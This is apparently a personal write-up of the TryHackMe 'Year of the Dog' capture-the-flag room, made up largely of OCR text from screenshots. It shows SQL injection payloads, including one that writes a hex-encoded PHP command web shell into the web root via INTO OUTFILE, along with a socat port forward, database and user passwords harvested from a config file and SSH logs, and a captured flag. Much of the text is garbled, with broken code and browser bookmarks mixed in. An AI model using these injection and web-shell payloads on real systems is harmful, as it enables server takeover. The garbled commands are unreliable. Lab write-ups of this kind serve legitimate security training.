tryhackme

View on GitHub

Year of the dog

20 August 2022 10:25 PM

union all select 1,’data://text/plain,<?php echo system(“uname -a”);?>’– -

3a88c8426b0218278e13ee00ab991fc0’ INTO OUTFILE ‘/var/www/html/rev-shell.php’ LINES TERMINATED BY 0x3C3F706870206563686F20223C7072653E22202E207368656C6C5F6578656328245F4745545B22636D64225D29202E20223C2F7072653E223B3F3E– -

Lid Privilege Escalation. •e Google Hacking DB Vigenere Solver -ww... GTFOBins Basic Linux Privilege E.. 3a88c8426b0218278e13eeooab991fco 12

cat config. php $servername = "localhost"; $username = "web $password = " Cda3RsDJga $dbname = "webapp" ; $dbh = new mysqli($servername, $username, $password, $dbname); if die( "Connection failed: "

Cda3RsDJga

wul-dataayear-of-thé-dog:/tmp$ ./socat TCP-LISTEN:2222 , fork TCP: 127.ø.ø.1:3øøø

O Google Hacking DB Viaenere Solver Home Exc*ore a 10.10.25.254:2222 Lxd Privilege Escalation GTFOBins Basic Linux Privilege E.. Online - Reverse Shell . Beyond SQLi: Obfusca.._ GitHub - bonsaivikinq/_. [Write-up] Vulnix - Pla. MDS Online I Free MD... R Register Sign I n Year of the Dog A painless, self-hosted Git service Easy to install Simolv run the binarv for Vour Olatform. Shio it with Docker. or Cross-platform Gitea runs anvwhere Go can comoile for: Windows. macOS.   sep Sep Sep grep 5 20.'53.•03 staging-server sshd[39218): wea-dataayear-of-the-dog:/home/dylan$ dylan work_analysis 5 staging-server sshd[39218]: Invalid user dy1anLabr4dørs4L1f3 from 192.168.1.142 port 45624 Failed password for invalid user dylanLabr4dørs4L1f3 from 192.168.1.142 port 45624 ssh2 5 staging-server sshd[39218]: Connection closed by invalid user dyIanLabr4dørs4L1f3 192.168.1.142 port 45624 [preauth]

ww-dataayear-of-the-däg:/home/dylan$ su dylan Password: id uid=løøø(dylan) cat user. txt HM{OTE3MTQYNTM5NZRiN2VjNTQYYWM2M2Ji}

dylanLabr4d0rs4L1f3